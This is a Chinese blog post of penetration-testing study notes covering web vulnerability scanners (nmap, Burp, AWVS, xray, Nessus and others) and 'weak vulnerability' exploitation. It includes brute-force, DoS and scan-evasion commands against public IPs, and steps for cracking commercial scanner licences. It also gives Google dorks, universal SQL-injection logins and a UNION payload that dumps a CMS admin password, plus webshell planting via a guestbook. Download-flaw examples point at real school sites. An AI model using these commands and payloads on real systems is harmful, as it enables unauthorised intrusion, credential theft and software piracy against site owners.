07.漏洞分析

1.web漏洞恩熙
2.漏洞分析工具
3.kali漏洞分析工具
4.弱漏洞利用
5.漏洞批量探测

1.web漏洞分析
我们要挖掘什么漏洞?
应该从哪里挖掘?
网站源码分析
已知源码
我们可以下载其源码本地分析
百度该源码漏洞
未知源码
黑盒测试该网站漏洞(手工、工具自动扫描)

我们要挖掘什么漏洞?
答:可以按照owasp top 10挖掘重点漏洞

应该从哪里挖掘?
答:sql url 无论怎么挖都和用户数据交互离不开
www.fanghan.com/news.asp?id=12&sid=123 //和数据有交互
www.fanghan.com/index.html //静态页面无交互,不易产生漏洞

有经验的工程师一般会
www.fanghan.com
1.通过信息收集
2.测试注入漏洞 / -0 and 1=1 1=2
3.识别cms //查看对应cms漏洞
fanghan.com/html/12?html //这是特有的伪静态
①分析出是aspcms 可以通过百度搜索对应的cms漏洞进行 探测
②下载该cms去分析源码(找到后台笛子,数据库路径,编辑器,上传,数据库备份路径等等)
data/#data.asp // 前台留言,直接写入一句话,菜刀链接
data/data.mdb //直接下载就行
③各类cms的exp
如果不能识别cms类型,通过信息收集,挖掘web应用程序漏洞(sql 上传,xss ,csrf,SSRF,逻辑,代码执行,文件包含等等)


2.漏洞分析工具使用
漏洞扫描工具:
namp awvs appscan burp xray w3af skipfish nikto nessus

NMAP---端口扫描之王 //信息收集会用到他
主机探测
端口扫描
服务版本扫描
主机系统指纹识别
密码破解
漏洞探测
创建扫描脚本

主机探测(一) //扫描你主机中哪些正常通信的,并不是关机的。
扫描单个主机 nmap 192.168.1.2
扫描整个子网,命令如下: //测这个网段有哪些主机存活,探测同时也会扫描100个经常开放的相关端口
nmap 192.168.1.1/24
扫描多个目标,命令如下:
nmap 192.168.1.2 192.168.1.5
扫描一个范围内的目标,如下: nmap 192.168.1.1-100 (扫描IP地址为192.168.1.1-192.168.1.100内的所有主机) 如果你有一个ip地址列表,将这个保存为一个txt文件,和namp在同一目录下,扫描这个txt内的所有主机,命令如下: nmap -iL target.txt

①nmap 192.168.1.1/24 100个最有可能开放的端口 //粗略的去看一下有哪些主机存活
②nmap -sT -p1-65535 192.168.8.128 //详细的去扫描单个目标所有端口
③nmap iL target.txt -exclude-file exc.txt // 扫描文件比较多就可以放到txt里面,放到nmap目录下去扫描 扫描target.txt 并排除掉exc.txt里的主机

如果你想看到你扫描的所有主机的列表,用以下命令:
nmap -sL 192.168.1.1/24
扫描除过某一个ip外的所有子网主机,命令:
nmap 192.168.1.1/24 -exclude 192.168.1.1
扫描除过某一个文件中的ip外的子网主机命令
nmap 192.168.1.1/24 -excludefile xxx.txt(xxx.txt中的文件将会从扫描的主机中排除)

端口扫描:

常用命令:
nmap -F -sT -v nmap.org
-F:扫描100个最有可能开放的端口
-v 获取扫描的信息
-sT:采用的是TCP扫描 不写也是可以的,默认采用的就是TCP扫描 -p 指定要扫描的端口
-p 80,90,3306,10-100

扫描端口状态:
Open 端口开启,数据有达到主机,有程序在端口上监控
closed 端口关闭, 数据有达到主机,没有程序在端口上监控
Filtered 数据没有到达主机,返回的结果为空,数据被防火墙或者是IDS过滤
UnFiltered 数据没有到达主机,但是不能识别端口的当前状态
Open | Filtered 端口没有返回值,主要发生在UDP、ip, FIN,NULL和Xmas扫描中
Closed | filtered 只发生在ip ID idle扫描


TCP扫描(-sT)
这是一种最为普通的扫描方法,这种扫描方法的特点是:
扫描的速度快,准确性高,对操作者没有权限上的要求,
但是容易被防火墙和IDS(防入侵系统)发现
运行的原理:通过建立TCP的三次握手连接来进行信息的传递
① Client端发送SYN;
② Server端返回SYN/ACK,表明端口开放;
③ Client端返回ACK,表明连接已建立;
④ Client端主动断开连接。


SYN扫描(-sS)
这是一种秘密的扫描方式之一,因为在SYN扫描中Client端和Server端没有形成3次握手,所以没有建立一个正常的TCP连接,因此不被防火墙和日志所记录,一般不会再目标主机上留下任何的痕迹,但是这种扫描是需要root权限(对于windows用户来说,是没有root权限这个概念的,root权限是linux的最高权限,对应windows的管理员权限)

 

UDP端口扫描
使用UDP ping探测主机:
nmap -PU 192.168.1.0/24
服务版本探测
nmap -sV 192.168.1.1
精准地确认端口上运行的服务
nmap -sV --script unusual-port 192.168.1.1


扫描出来不知道的端口服务怎么办?
1.百度
2.可以通过http访问 //fanghan.com:8811
3.nc telnet nmap 对端口进行指纹识别

nmap -sV -p8120-8130 192.168.1.1 //服务指纹识别
namp -sV -p8120-8130 --script unusual-port 192.168.1.1 //服务指纹识别不行就用这个

探测目标主机的操作系统

nmap -O 192.168.1.19
nmap -A 192.168.1.19
-oN 导出扫描结果 //txt格式方便报告
-oX 导出扫描结果xml格式

nmap信息收集脚本 国外的接口
脚本 解释
hostmap-ip2hosts IP反查
dns-bruts DNS信息收集
membase-http-info 检索系统信息
smb-security-mode.nse 后台打印机服务漏洞
smb-check-vulns.nse 系统漏洞扫描
http-stored-xss.nse 扫描 web漏洞
snmp-win32-servlces 通过snmp列举windows服务/账户
dns-brute 枚举DNS服务器的主机名
http-headers/http-sitemap-generator HTTP信息收集
SSL-enum-ciphers 枚举SSL秘钥
ssh-hostey SSH服务秘钥 信息探测

使用方法:
nmap -sn --script hostmap-ip2hosts www.fanghan.com //对目标进行IP反查
nmap --script dns-brute www.fanghan.com
nmap --script dns-brute dns-brute.threads=10 www.fanghan.com //对目标DNS信息的收集
nmao -p445 192.168.23.1 --script membase-http-info //了解目标系统的详细信息


密码破解
暴力破解VNC
nmap --script vnc-brute --script-args brute.guesses=6,brute.emptypass=true,userdb=/root/dictionary/user.txt,brute.useraspass=true,passdb=/root/dictionary/pass.txt,brute.retries=3,brute.threads=2,brute.delay=3 42.96.170.128
破解telnet
nmap -p 23 --script telnet-brute --script-args userdb=myusers.lst,passdb=mypwds.lst --script-args telnet-brute.timeout=8s 192.168.1.1
ftp弱口令暴力破解
nmap --script ftp-brute --script-args brute.emptypass=true,ftp-brute.timeout=30,userdb=/root/dirtionary/usernames.txt,brute.useraspass=true,passdb=/root/dirtionary/passwords.txt,brute.threads=3,brute.delay=6 192.168.1.1

漏洞探测
扫描系统漏洞
namp --script vuln 192.168.1.1 // 其实就是扫描cve的漏洞
//扫描下有没有漏洞,有的话直接使用msf对系统进行漏洞利用
HTTP.sys 远程代码执行
nmap -sV --script http-vuln-cve2015-1635 192.168.1.1
IIS 短文件泄露
nmap -p 8080 --script http-iis-short-name-brute 192.168.1.1
拒绝服务
nmap --max-parallelism 800--script http-slowloris www.cracer.com
验证http 中开启了put 方法 //如果开启可以直接写入一句话进去。
nmap --script http-put --script-args http-put.url=/uploads/testput.txt,http-put.file=/root/put.txt 218.19.141.16
验证MySQL 匿名访问 //能不能用空密码进行访问mysql
nmap --script mysql-empty-password 203.195.139.153

防火墙躲避
-f 分片绕过
-D使用诱饵隐蔽扫描
NMAP -D 1.1.1.1,222.222.222.222 www.cracer.com --source-port 源端口欺骗
//防火墙识别你是通过原地址和原端口,这个是指定地址进行欺骗

技术文章:
https://blog.csdn.net/ZiXuanFY/article/details/52513512


AWVS
安装完后也只能谷歌使用

安装重点:
1.可以在内网直接访问3443端口
2.安装证书
3.破解
复制wvsc.exe到C:\Program Files (x86)\Acunetix\13.0.200205121 替换掉
复制license_info.json到C:\ProgramData\Acunetix\shared\license 替换掉

//AWVS配合xray可以批量扫描

网站爬行
漏洞扫描
目标发现
子域名扫描
http 编辑
http嗅探
http模糊测试
认证测试
网络服务扫描器

Dashboard:
Dashboard是一个仪表盘,里面包含所有网站高危中危普通漏洞总和。
Most Vulnerable Tarfets 这些是扫的ip以及端口
TOP Vulnerabilities 漏洞的分类

菜单类的介绍:
Targets(目标):
Add Target(添加目标)
Add Targers(一群目标)
Target Groips(分组)//每天扫20个就可以建个文件夹方便管理
实例:
①创建一个组名称为2020-7-14 添加目标http://192.168.194.138:8001 分配到2020-7-14 保存
②保存以后 Buslness Crlikaliyt是否是作用为商业用途。//默认就可以
③ Crawling爬虫信息 User Agent 是否使用默认,使用谷歌或者火狐 // 不要使用默认,会被安全狗拦截
④路径默认就行
⑤import Files 导入文件结构 //也可以不导入
⑥HTTP:Authentication 开启后这个认真是爬取到用户名密码自动认真 //不填也可以
⑦Client Certificata 开启后,填入相关证书 //不填也可以
⑧Proxy Server 开启代理选择 HTTP 127.0.0.1 1080 //扫描后会先把请求交给ss代理,在由ss代理出去,这样更加隐蔽。如果屏蔽代理就扫不到
⑨Scan 扫描yes 会有选择
Scan Type(扫描类型):
Full Scan//完整的扫描
High Risk vulnerabilities//高风险的漏洞扫描
Cross-site Scriping Vulnerabilities//跨站漏洞扫描
SQL lnjection Vulnerabilities //sql注入扫描
Weak passwords //只扫描弱口令
赶时间就扫注入,因为扫注入牛逼
Report(模板)
//模板默认可以不用生成,扫描完后再去生成

扫描后:
Scan lnformation,扫描信息 漏洞级别
Target lnformation 会列出类型
扫描信息,服务器版本,系统,脚本
Discovered Hosts 网站的外链
Latest Alerts 红:高危 黄:中危 蓝:低危 绿:信息泄露
Vulnerabilities 漏洞的详情
Site Structure 蜘蛛爬行的站点信息
Events 事件信息

Reports 报告生成
New Report创建报告
Scan Report目标报告
Target Report 扫描报告
All Vulneraxxxx 漏洞报告 标准: ISO2701 OWASP Top10 2017 企业较多用

Email Settings 扫描发送给邮箱
Excluded Hours 定义客户扫描事件

系统里面自动切换ip
kali有一个--auto-ip-changer 每5秒切换一次ip
主要是对抗阿里云封Ip


APPSan
1.安装appscan9.0软件:运行“APPS_STD_EDI_9.0_WIN_ML_EVA.exe”。
2.安装appscan9.0临时补丁:运行“9.0.0.0iFix001-AppScan.msp”。
3.安装appscan9.0.0.1补丁包,运行“9.0.0.1-AppScan_Setup.msp”。
4.破解,将“LicenseProvider.dll”替换到“\AppScan Standard”目录下。

复制APPSan文件包---按照readme.txt的顺序---
安装dotNet461_WithFix_CHS_2016.06.08.exe 程序
默认安装就可以了
在安装2
在安装3
操作4


//不知道如何给客户讲的话可以参考APPSan里的修复方案

进入页面后
创建新的模板 // 可以试试其他模板
常规扫描---
web应用程序扫描---
起始url:目标ip
添加其他域名 // 也可以添加子域名
配置代理 //也可以不配置
不记录---
缺省值---
完成---yes---
保存扫描结果

开始后自动先爬去目录和链接
左上角手动点击开始扫描

 


Burp2020

Dashboard仪表盘:
Tasks任务模块
1.Add links Add item itself ,same爬虫
2.Audit checks - passive 扫描漏洞的
Event log事件模块
lssue activity漏洞模块
New sacn 主动扫描//审计目标,并给目标发送漏洞验证
details 边爬边扫
只爬行不扫描漏洞
填写扫描地址
con figuration 扫描配置---Clawling:
爬虫线程
爬行时间
登录信息
扫描配合---Auditing:
扫漏配置,默认就行
Application login 爬虫账号密码
Resource pool 线程时间,提交间隔时间//默认即可

New live task 被动扫描//单纯审计流量查看可以目录

被动扫描无法添加目标
Proxy Repeater intruder 发送到这几个里面他会自己进行探测
爬取到的目录在Target里面

Proxy代理抓包
右键Do intercept response tothisxxxx//返回当前响应包
放包
响应包可以把fels 改成true
//一般会在验证的地方改true例如登录界面修改
HTTPhistory //代理历史记录

Options代理设置小知识
All interfaces//如果设置这里所有的网卡访问8080都会被抓包

抓HTTPS小技巧
火狐挂载代理输入127.0.0.1
搜索burp
CA Certificate 点击下载
工具---选项---高级---加密---查看证书--
服务器---导入---下载的der后缀
找到 PortswiaaerCA点击编辑信任---信任此证书---编辑信任都勾选---确定
导出PortswiaaerCA----当前环境下后缀是CRT ----
导出之后---证书机构---把导出的CAT导入进入确定---确定


测试https://baidu.com。 就能抓到443https的接口了

谷歌抓https
现在代理里面把https 127.0.0.1 8080添加上、
设置---高级---更多---管理证书---
受信任的根证书颁发机构---下一步---浏览选择刚刚的crt证书---完成

手机抓取HTTPS
找到百度手机型号,把crt证书导入到里面去就行

Options代理设置
代理挂载点/导入证书/导出证书
截取客户端请求//默认
响应包请求//默认
Mtch and replace替换头部信息cookie


Intruder
Positions
爆破用的多
Sniper //就加载一个字典
Battering ram // 两个多个变量使用一个字典。适合爆破账号和密码一致的情况,例如企业员工登录接口
Pitchfork// 每个标量使用单独一个字典,变量1字典1,变量2字典2. 顺序从上到下,从左到右位置来确定。
Cluster bomb//交叉爆破,取用户名1跑100密码,用户名2跑100密码,用户名3跑100密码


实例:
爆破企业员工登录的后台可以,指定密码,采用Sniper调用字典pas(中国姓名前500)来爆破。

ip池跑方法,用Battering ram client-ip来更换IP变量。


Payloads
payload type字典类型较多使用的有
Simple list单一文本
character substitution// 字符变化数字
Numbers //跑数字。 格式:1 1000 1 跑1到1000的数字,每次递增1
1 4 最小的整数位 最大的整数位。 最小的小数位 最大的小数位
Brute forcer//暴力破解验证码,4位大概10分钟自动生成字典拍
Extension-generated//根据扩展插件随机生成,例如随机ip插件

Payload Processing里面Add添加:
Add prefix //在头部添加信息
Add suffix //在尾部添加信息
Match/replace//匹配替换 //匹配到admin替换为fanghan
Hash和Encode//转编码,大多页面都会把密码转为编码提交到服务器。这时候用到这个就行
Intruder文章
http://bubuko.com/infodetail-3506522.html

Payload Encoding URL编码
一般都去掉,比如跑目录的时候会不正确

Options
Upedate control//默认更新头请求信息,Waf会检测

Request Engine线程类
Nemberxxx:5 //5个线程一般给15就行,多了小站会跑死
3 //出现错误重连次数 3次
2000//每次重连间隔时间2000毫秒
Attack Results //扫描保存的信息
Grep-Match // 匹配规则

Grep-Rxtract//正则匹配规则
从结果里去匹配相应的信息

Repeater 重放器

Sequencer taoke识别功能

Decoder 编码解码功能

Comparer 请求对比 // 在proxy右键发送

扩展重点
除了商店自带的扩展以外,自己添加扩展方法 例如:fake ip 帮助生成Ip
1.Options
2.Python xxxx安装jython.jar环境
3.Extensions选项Add--Extension type 选择python
4.Extension type(最好不是中文路径) fake ip
5.找到repealer 选择框右键fakeip
6.fakeip:指定ip 127.0.0.1 随机生成ip
7.client-ip 1.1.1.1 //拦截位置添加变量
8.Payloads里面使用扩展类型
9.跑

还有有个扫phpStudy-Backdoor-passive.py 后门的插件需要自动添加
burp设置代理服务器
User options
Upstream Proxy Serers
Add
*
127.0.0.1
1080
这就是由burp把代理给ssr

切换代理ip文章
https://www.uedbox.com/post/59218/
//得注册一个亚马逊的key

插件可以查看工具里带的文章


Kali 漏洞分析工具使用
skipfish
shipfish是一款web应用安全侦查工具。skipfish会利用递归怕重和基于字典的探针生成一副交互式网站地图。最终生成的地图绘制通过安全检查后输出。
使用:
skipfish -o (输出位置) -W/-S (字典文件位置) (目标网站)
扫描结束后查看输出文件即可。。

1. ls /usr/share/skipfish/dictionaries/complete.wl //复制下来字典路径,先查看字典位置
2. skipfish -o 123 -S 路径 回车//在root 123目录下
3.skipfish -o 123 -S 路径 http://192.168.194.138 扫描
4.任意键继续
5.Database statistics:Issues found: 23 info (信息泄露), 0 warn (警告),0low (低危), 0 medium(中危), 2high(高危 impact

7.扫描完成后去123里找index 查看结果,并且打开错误页面用手注入验证
8.用sqlmap -u "注入地址" 进行验证

w3af

w3af是web application attack and audit framework(web应用攻击和安全审计框架)的缩写。
它是一个开源的web应用安全扫描器和漏洞利用工具。
两种使用方式:
一种图形界面
二种是命令行

图形界面进入方法
cd w3af/ 进入w3af目录
ls // 查看执行程序
./w3af_gui //执行图形程序
相当于awvs 和APPscan主要扫web漏洞
功能:web扫漏,Manual Request(手动修改请求头), Fuzzy request(压力测试),Encode/decode(编码),导出请求,对比,设置代理。
我们使用主要功能扫漏洞即可
empty_profile空模板自定义
audit //扫描漏洞,里面可以自行选择需要扫哪些漏洞
//盲注,溢出,跨站,CSRF,代码执行,文件上传,文件泄露,本地文件包含,远程包含等等。
auth //认证插件,指定用户名密码
bruleforce// 爆破的
crawl //爬虫

如果不知道选择哪个就选择自带的模板比如
OWASP_TOP10
XXX
XXX
XXX

每次扫描他会指定操作系统和脚本类型,保存关闭扫描
log里查看结果
Results
exp查看漏洞情况

这个扫描器是重量级扫描器,特别针对代码执行漏洞

命令行使用方法
cd w3af/
./w3af_console
1.help //查看需要设置的东西
2.进入plugins//进入插件目录
3.help //查看9个插件分类

漏洞插件
4.audit//查看漏洞插件
如果只想调用sqli和xss怎么办
5.audit sqli xss // audit all 是启用所有插件
6.audit//查看调用情况 Enabled证明调用成功

爬虫插件
help
7.crawl//查看爬虫插件
8.crawl web_spider phpinfo//调用这两个插件

输出结果插件
9.help
10.output //默认是在console 控制台输出的也可以保存自定义文件
11.back

设置目标
12.target//进入设置目标
13.help //查看设置
14.view //查看设置的目标
15.set target http://192.168.194.138:80 //设置目标为192.168.197.138:80
16.set target_os windows //设置目标操作系统为windows系统
17.set target_framework php
18.back
19.help

设置访问出发点
20.http-settings
21.help
22.view //查看设置目标 默认的user_agent 是w3af.org如果有WAF会拦截
23.set user_agent 替换掉百度爬虫的连接
24.save//退出
25.back//返回菜单根目录

最后总结s
26.help
基本设置的是plugins插件,target目标,http-settings躲避参数
27.start//开始


ninkto
Nikto 是一款开放源代码的、功能强大的WEB扫描评估软件,能对web服务器多种安全项目进行测试的扫描软件,去寻找已知有名的漏洞,能在230多种服务器上扫描出 2600多种有潜在危险的文件、CGI及其他问题,它可以扫描指定主机的WEB类型、主机名、特定目录、COOKIE、特定CGI漏洞、返回主机允许的 http模式等等。它也使用LibWhiske库,但通常比Whisker更新的更为频繁。Nikto是网管安全人员必备的WEB审计工具之一。
-h 指定扫描的目标 –p 端口
nikto -h www.xiaojin.org -p 80,8080,8081
-C 指定CGI目录 –all表示猜解CGI目录
nikto -h www.xiaojin.org -C all
-T选项包含很多小选项 –T 9表示扫描SQL注入漏洞
nikto -h www.xiaojin.org -T 9
-o 指定输入结果
nikto -h www.xiaojin.org -o result.txt

nikto -H //查看详细帮助

WFUZZ

是一款用来进行web应用暴力猜解的工具,支持对网站目录、登录信息、应用资源文件等暴力猜解,还可以进行get及post参数的猜解,sql注入、xss漏洞的测试等,该工具所有功能都依赖于字典文件。
用法: 猜解www.cracer.com/目录下有哪些页面和目录,通过加载字典文件进行猜解,并且排除404页面,将结果以整齐的格式存放到0k.html
wfuzz -c -z file,字典文件(pass) --hc 404 -o html www.cracer.com/FUZZ 2>0k.html 猜解登录表单的密码
wfuzz -c -z file,字典 -d "login=admin&pwd=FUZZ" --hc 404 http://www.cracer.com/admin/index.php
猜解id号
wfuzz -c -z range,1-1000 --hc 404 -o html http://www.cracer.com/?post=FUZZ 2>ok.html


wfuzz字典位置:
ls /usr/share/wfuzz/worflist/general/medium.txt //复制路径

wfu -c -z file,字典位置 --hc 404 http://192.168.194.138/FUZZ


Wpsan

Wpscan在kaliLinux2.0 中默认已经安装,WPScan是一款针对wwordpress的安全扫描软件;WPScan可以扫描出wordpress的版本,主题,插件,后台用户以及爆破后台用户密码等。

wpscan --url 地址 -e u
-e 爆破的意思
-e u //爆破用户名
-e p //爆破插件
-e t// 爆破主题

p分类:
ap 所有插件
vp 漏洞插件
t分类:
at 所有主题
vt 漏洞主题

-U admin -P /root/pass.txt //指定用户名admin 爆破密码路径

 


XRAY
使用方法参照文本:https://www.anquanke.com/post/id/184204
https://docs.xray.cool/#/tutorial/introduce

启用XRAY
./xray_linux_amd64

1.使用基础爬虫爬取并对爬虫爬取的链接进行漏洞扫描 //自带的爬虫工具
xray webscan --basic-crawler http://example.com --html-output vuln.html

websan --basic-crawler http://192.168.194.138:80 --html-output 123.html

2.使用 HTTP 代理进行被动扫描//类似于burp侦听端口
xray webscan --listen 127.0.0.1:7777 --html-output proxy.html
设置浏览器 http 代理为 http://127.0.0.1:7777,就可以自动分析代理流量并扫描。

3.只扫描单个 url,不使用爬虫
xray webscan --url http://example.com/?a=b --html-output single-url.html

4.手动指定本次运行的插件
默认情况下,将会启用所有内置插件,可以使用下列命令指定本次扫描启用的插件。

 

xray webscan --plugins cmd_injection,sqldet --url http://example.com
xray webscan --plugins cmd_injection,sqldet --listen 127.0.0.1:7777

5.指定插件输出
可以指定将本次扫描的漏洞信息输出到某个文件中: //不指定插件会默认使用所有插件去扫描
xray webscan --url http://example.com/?a=b \
--text-output result.txt --json-output result.json --html-output report.html

用的比较多的不是单纯的调用,而是批量去扫描。

调用360的天相爬虫,爬到的保存起来交给xray,再去抓取扫描
调用原理:
先在xary侦听到目标站7777端口,在写一个python脚本去启动360天相的爬虫爬去指定的链接并且生成txt,
在把txt里的链接交给侦听的7777去扫描。


首先:需要在kali里面安装谷歌浏览器,然后还需要一个python写的脚本工具里叫launcher.py
在需要360天相爬虫。

webscan --listen 127.0.0.1:7777 --html-output p.html //先侦听端口
vi targets.txt //把需要爬的地址放到targets.txt里,可以写多个,例如测试c段或者目标比较多。
http://192.168.1.1:8080
python launcher.py //启用后就会给craw发送指令去抓取targets.txt里的网址,并且保存到sub_domains.txt里面,并且在把sub_domains.txt交给xray去扫描


Nessus

//我记得得需要企业邮箱
// Kali 下载就下载Debian 64的下载
下载nessus软件包
官方地址: http://www.tenable.com/products/nessus/select-your-operating-system
安装
dpkg -i Nessus-6.5.4-debian.deb
默认安装目录为/tmp/nussus
启动nessus
/etc/init.d/nessusd start //停止是stop

通过注册获取激活码 注册地址:
http://www.tenable.com/products/nessus/nessus-plugins/obtain-an-activation-code

1.netstat -tnlp //启动后查看侦听的端口 侦听的端口为8834

2.打开浏览器https://127.0.0.1:8834

3.第一次登录需要把激活码填写进去

4.第一次会更新内容需要一个半小时,如果奔溃了,就使用离线更新,工具包里有帖子

//all-2.0.tar.gz Nessus-8.10.0-dede //离线更新的包
5.admin admin

使用方法:
New Scan 主页可以创建新的扫描
lmport //导入扫描结果
Now Fdder //创建新的文件夹
//新建扫描模板如下:
Host Discovery //发现网络当中存活的主机
Basic Network Scan // 扫描网络信息
Advanced San //高级扫描 //自定义插件
Mobile Devxxx //发现网络中移动设备扫描
web APPloxxx //基于web应用程序的扫描
Credentinaxxx //认证的绕过等
Bash Shellshock //shell的执行等

例如扫描web //实际上就是他勾选了几个web漏洞插件
例如自定义扫描就是用高级扫描

进入高级扫描后进入配置界面

Name (创建扫描的名称)
Description(描述随便写)
Folder (文件夹选择默认即可)
Targets 目标
这个目标可以是域名,可以是ip,也可以是一个ip段 ,C类网址也可以//
//192.168.8.1-192.168.8.100 或者192.168.8.0/24

Add File //可以添加一个扫描文件,把地址域名放进文件加载扫描

Credentials 这个认证可以执行账号密码进行更深层次去扫描

Plugins //插件 右上角Enable All 启用 Dissble All

例如插件勾选:
Backdoors //检查是否有后面
Brude force attacks //暴力破解账号
CGl xxx //可以勾选下
Databass //数据库
Denial fo Service //拒绝服务
DNS
F5 //网络负载均衡
Firewalls //防火墙
FTP
Gen loo Local Secuity //基本信息
Servive doxxx //服务指定
settings //
SMTP problems //有没有邮件
SNMP //网络协议
下面几个Windows插件
设置完以后点击Save保存
返回出去点击开始标致


信息放大

当我们测试目标没法漏洞时,我们会将目标放大,发现更多与目标相关联的信息。
例如:
旁站-->C段?子域名
旁站: C段:获取到收集方向:ip、端口、域名、目录。
同网段其他服务器后要记得验证是否在同一机房内。
子域名:柿子挑软的捏(找低版本的更容易下手)
工具:Layer子域名挖掘 site:cracer.com

搞不了主站就去搞旁站,先了解旁站用几种方式搭建的
ip,端口,域名,目录,这4种搭建
ip不好发现
端口:nmap -sV 1.1.1.1扫描这个目标 识别高危端口//学校教育政府OA喜欢端口建站
域名:爱站,工具站点
目录:御剑扫描目录,bbs old shop upload m //扫出来后都得去访问下是不是另一个站点。
获取旁站的权限,再去提权,迂回拿到主站权限。


相关弱漏洞利用

暴库利用
下载漏洞
后台爆破
Exp使用
批量漏洞检测

暴库利用:
爆出了网站数据库文件位置
to parent directory
last modified Description
转到父目录
inurl:/.asp<id=<% <%< %
绕过防下载
#sdsf.mdb
下载时改成 %23sdsf.mdb
如果数据库文件本身就是asp、asa、cer文件,也可以直接写shell。
Aspcms

遇见这种:!@#¥fafsdafasfsaf.mdb如何下载
答:把她转换成url编码再去下载 在HackBar ENCODING转换

遇见:123123.asp //数据库文件变成asp怎么办
答:使用迅雷下载,下载后改成123213.mdb就行

asp2.0一般会有data目录
特定的cms 会有data目录/data.asp
data/db.asp
在前台留言插入一句话,使用菜刀连接,因为数据库是asp就直接连接了

下载漏洞 ///asp不多了,php比较多

phpcmsv9,meiunfo 6.0
大概位置:admin/234sdfsafs/php?fileconfig=../../congig.php//数据库路径和账号密码会泄露
如果根目录下有phpmyadmin就直接用密码等,如果没有,找旁站100个里总有一个有


下载文件名称为参数传递并且可控可操作。 http://ipo.snnu.edu.cn/shida/UploadFiles/indentAttFile/2012061222041778.doc http://ipo.snnu.edu.cn/down.asp?fileup=shida/UploadFiles/indentAttFile/2012061222041778.doc http://www.sxzzy.cn/ggjs/news/down.asp?FileName=doc/2012-5/2012053010329973.doc
下载漏洞利用


通过蜘蛛爬行
找到该url
下载 conn.asp config.php config.
asp db.mdb


后台密码爆破
网站常见的cms管理系统有:
织梦、discuz、帝国、phpweb、WordPress、aspcms、科讯、南方、良精、ecshop等
常见初始密码弱口令:
Admin、admin888、admin123、123456、111/123/111111、等等。
逻辑万能密钥:
‘or’=’or’
Admin’ or 1=1--
常见破解工具
Burpsuite
Discuz破解qi 
一些python密码破解脚本
httpfuzzer
针对性破解工具。。

当遇见:fanghan.com/897898/login.php //很有可能897898就是密码
fanghanadmin
fanghan.com
fanghan123
admin_fanghan

万能秘钥
asp 'or'='or'
php admin'or 1=1

后台爆破这一块:
无验证码,用burp
有也可以用burp


关键字 :
Powered by AspCms2.0
admin_shopxp/upLoad_bm.asp
inurl:news/html/?411.html
注入地址:
down/class/index.php?myord=1
news/class/index.php?showtag=
万能密码 admin 'or '1'='1
织梦批量 搜索关键字:
Powered by DedeCMS_V57_UTF8_SP1 2004-2011 DesDev Inc
inurl:shopxp_news.asp
TEXTBOX2.ASP?action=modify&news%69d=122%20and%201=2%20union%20select%201,2,admin%2bpassword,4,5,6,7%20from%20shopxp_admin

posted @ 2020-09-05 15:06  那个人叫方寒  阅读(1374)  评论(0编辑  收藏  举报